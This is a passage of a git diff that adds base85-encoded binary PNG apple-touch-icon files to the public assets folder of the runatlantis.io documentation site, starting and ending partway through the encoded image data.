z18}|r3hOh<?tZ_s50`}V<p!VzSM(jK=I0UEm{A5&aMxPsw?RZ$s4D+;Nw{S|*_89!
zT&}{q7lr9!RDN^-BS3^7fqXkD#IytX4Tb08@;2w-p-sL8R22`HEeYq!e%V45{;&j2
z*d}HG5!kaHZXWO}McU66RlnX<`0c#!>Zg{W;MN%$>Nj3bjt<L@yMpxNp#C0O!^GD%
z!IoTGy#Rj|ed_|ef2Fl9Yr)^&*jPCQKh&(2R$O@gG!)verv(xD^U+~xila>+$0pRE
zyrJlxBncZbV6S2mSaO4vw9D$bF$)h~-(6mmj$BR{z{pe;<PgGrQMa{;#z|!_!X9a}
z9?ex&uS|Vw*MZKL;n}O&y9Bb6<TlFosInJ05Un!cZ?=IyAgz1RKS4T$vU_yIx27GI
zD*A|stQug}@`Hbmfw?kVsljrmy@%_NJ^n74Q@^LWWhceIx)(CNVdn`)kc6_;(=LTa
zfENkGn6U{DRo)AaOP%D0)9iD7Fqn>%D@+#PQbMHCN{QUBUc#C^4M5sX<Ms8k^rf%j
zt-ZblQ#5T0?8y5I)TIjKZGUe(SBAx!zZfOzsd`jI?id}G5TxD$9BVr+32{DUTIYtV
zt)~pFtYH1(->~M+)|EG6$Y=9tD#g;>e}l87y#sB{`3qDs5IDI6OYJ@A*3n@(Vf)Pb
zSf`lPVpf5g(sA`vRm$bF^uBfgGdJ7B>Z(VvTqLJC2HrkE;kJ7yfA03gxH(gTbLIB^
zIGt8-)yIGn;_q&l5Y?ezcTN4Y3z2<G9BAa2p@N4)(Y-*ynPu5MOR+S~@PA%p;8NV5
z8e2p`$YpX^mQ7{zc8YgCfQIul)RX8Khr0@z2RPKFb=x-y4BNm~fg!}-dNtZLM2E*6
zjSRE|TbQ!Dz~st*u<U$-hf{B`=7LLc(9nO$t8eZU_~a&=b31IZ1!dd&HFUm6Z>AS}
zc8c`7FHpJXaWvZ(3~#izFdwArM=u{()6uLkj6<MXZB_1+x~SMlNpO}6#n&&O{L%B&
zWuo{q3hudP@ggj2G%Rc|T=z!@%Mnyy`sNg;|I7vvO8v^hh90h&buqXs+?2;nR~U5O
zU_`%)!9wv^lo_tb84NZX^k&l9i^Oc}TQZ6PMC#snr!B&*b#|qB&lP<~PqIPbO!+Vc
z=NtePug0=dpx4fkwK9R(m4%HKR!up*JH?gjtj2KT1HXJj5XGDdq_bSH&v9ChFi_dR
znd+}8+VkLfU|C$uPH?mLHPSS@bX3p!L7+bM<W?JHBy_{L$s=|H3GM8^7i(wuq<k1e
zsd)|;Dwk1|6}QaB%sNuWSN?;$(+vx^Ju(SYYLLqS!Z|s?tg`~OD%2W0Wu4>0+%MSe
z{T()u_?3h<BxS^?u+{J1H*a`a4~vLAGBbsB_%+;_4>?tM#UD3?`RZcRd|s**155gk
zhAywtm}x3#H18^`R8Z7!n$Olj*A*{SDOApKN)F<wTi3U)exRpc=If@yRv8=D%LvzW
z-C~pq*gyF`l#77i+EC31Q`;Pl?^yPQOGCn%)BwG9)?Y*GViPPFTPm<E$n`+V_KRJG
z!V1)!hJJ&2)|=f7d3!n@*8*$J+d$rr7?J55Y3D}?#X9l^lvnDNmIGGBV`5`5n9899
zU)lNEA`7)e1i^?QYxOXg>PN&x4$+OyG#DYNx#-dgVj1YmA+|yLd!bPBT^e9{g$n~8
zk}_Ft^zQP3h8|d7EbElF6|FnB#u6b`^TB(__%YDNvc53jarm|sidnC@aiqgAD7m;S
z*NW6UhxI+zMxix@zMi6zE-TfHkaCob<0UrFSXi!7=oehi!nKr-c6lsWC1(46hcPyr
zy*r|oi%0dejsNi_-Q-Cj5>K(-`xWN+yY;|-rO)H!P=${-SMiKLYND`ixrhFe&BgvI
zOBu(Xg4&F^>{VED3Jj$B>Rw_w%C%=*ZaC#IaM43FxNs4{G8RS*j^~iQDD<RyNZBdY
zUNXFWZ;fiI!c6ABaZQ!2-WO<c!3LhHEl}|1WMGA0=F03e<~MKRocV~;Gk>I9DdVos
zaq{jpl-JmVA*Zisxa)Y14GU>{QaxDd6mQ>jnUmN1b5|9Nr{vF+$jw#hpE^(Pyo-2>
zW>fT5Ei$CgTpq7~5Gz=fRl#vx5Qp&2s8lT>B4nyIe|g;Ex3`!5E11j)R?KC#>leu~
z7zbLA?|*dhV-dDT?JFw<C>8N6!EtJ6wXp+MOQ@`|Q4zSZK<;O6k}7-ku$1e`VNy2d
z?!N<f-C6+bvP){Y`+cM_hE%FuXb5x@e~trGdX!2}fX0YF01O~B?o?Envga1d)2h0?
zS(F8)-#51f#7_Z5NL5x?`{r+;;zj~7l&fX(R-Sc7r<wZep+=iFCyCEQmEdWjmb2cp
zeRjS!?y26pTDgKpZt*fVOdO+JQ|KLR<;nIU#S$0hmZ_#PSF8H}DjAV+8#vbW#wkLI
zP#jpxsoU>cb&LN?Qk7#y#2oG#Q2#_pL@>r2HlN?JWfC}(z|tliFH3rN8??CWPWhz%
zyXAv2W%{0>8z;@^u<@Ll9&jA(@Rg}`%hxb|{JK1zZYM9Aj`Jtw<AWJbC-fn_`qVb@
zY=DcGoEOSf=O4jW-m(PCfHC4f7Fc0AEEno|3GzPh#1ncOiYl2jSaG0nz)=~k`(lH6
z0fH;Z^@I7NGZz<6xSn^5DtMkYPB^P15q~4@KLKb1Mx^nM)|*B;EDw2`WJGwvSS%7B
zkXH8<;Y6*RI@(nGrTr(rQFFcLH1ye)1Lf5q{*>)jAv0Vg>u39>cQ9Z;rpJ2n;Nv4d
zhR7#^!M^N^B20zoM5XCW*xXyAOq%lk<&<bNAO0oQrp}!xPvU*4&s#q;dj8|N{^L5}
zI!dkP;kY`LN%g!KYHY&im4~-Ewq>3P-GjQTL|sN&%Hn*XPK|us$6{@yg*PgXSYJ_I
zIy@qRZJB3Yd3c)>Vr%+FwQKXbmyO6fZ5-w^(Pxdst8H&Y-r2c%?aT4DO+fcNH$GIZ
zI==&gFOl)d6;8N#w@HgY{7$Fcn-1xAl*A(|nY8^Ehn^gnjFz^1Z9Mek$YjbgPd5vT
z&&@W$H!(=Z+a$d^rQ1ENJSodO9S4{Q5@5%sYxY}4_Css*ioV;`5zT8dPy805rCqF#
zB=%_9GO~Zi4cG2(m6qVH0eOG>(#Pp5%jMTRP5$cq|A~yqp~1e)mtTE!N8+cSb|1&h
ztB>w*db8<=jK~qcD02VTVxA7RY|E2mVvU(m8|IA5(K^5*z1j3b?EpqWCjLh4;1fFw
zz1j2wM&vCZaQ%oDVLEZ?3+s}3G$KR8o2(}O;QlqZMAD$#zX<osjL2KP+4KVkpV-;)
z7g;9u_TqpKKC!bfkk33|8MD9h0uV>inJ2mlkd}pnNO?0)SY{cse;}Xf3NVx!|7mmL
z&$GY&%d^Z}SbWNHy&q^0UP5)Ew{k53Bz9vLwyOt_Akq5OjOJ63)Mc;OmU(*9`u_dT
ze`QlQd`%$Rf}{C2=iZ*@#&=a~?z5ii7grbaT3{vA$J->=8<BU?DeId_Vd82)Mu8>$
zc-;WrQ?H*lQ?v7rxSsdVs%+QDkVk*c8R}YBIhwD#L8M$7)~kQx^|yCZmNCz4zkbcj
z`|sb_4O5GuqTY42KeRUwzBFYo7R!&jo_<GFKi{qQt0fV6-!k&Of!@qde*Wn8D#>0J
z*E9Yf4_>D&VW-B?y!pycCn;5&+iI@+gsSdUWy`1eEo-nDKO-UsQkL~Xw#PpD%g2Ti
z`%KV{SXo1EhdvX3gWj$FAKpA~&YWKysygl$Jk?uO83Emb|9>I<k#D(6zy**qB8(f6
sV`<wuyyd#V$$!1?y0+faMW;miA5O6Sr1u{(U;qFB07*qoM6N<$f)%7FL;wH)

literal 0
HcmV?d00001

diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-60x60.png b/runatlantis.io/.vuepress/public/apple-touch-icon-60x60.png
new file mode 100644
index 0000000000000000000000000000000000000000..f60956692e705f2b0262aaa15b3c8f2db39674a5
GIT binary patch
literal 4016
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
W;jzw+o(94I0000<MNUMnLSTX@VBB{A

literal 0
HcmV?d00001

diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-72x72.png b/runatlantis.io/.vuepress/public/apple-touch-icon-72x72.png
new file mode 100644
index 0000000000000000000000000000000000000000..5bad7f3a8661133ea270b9b135b80430be6542b5
GIT binary patch
literal 4854
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
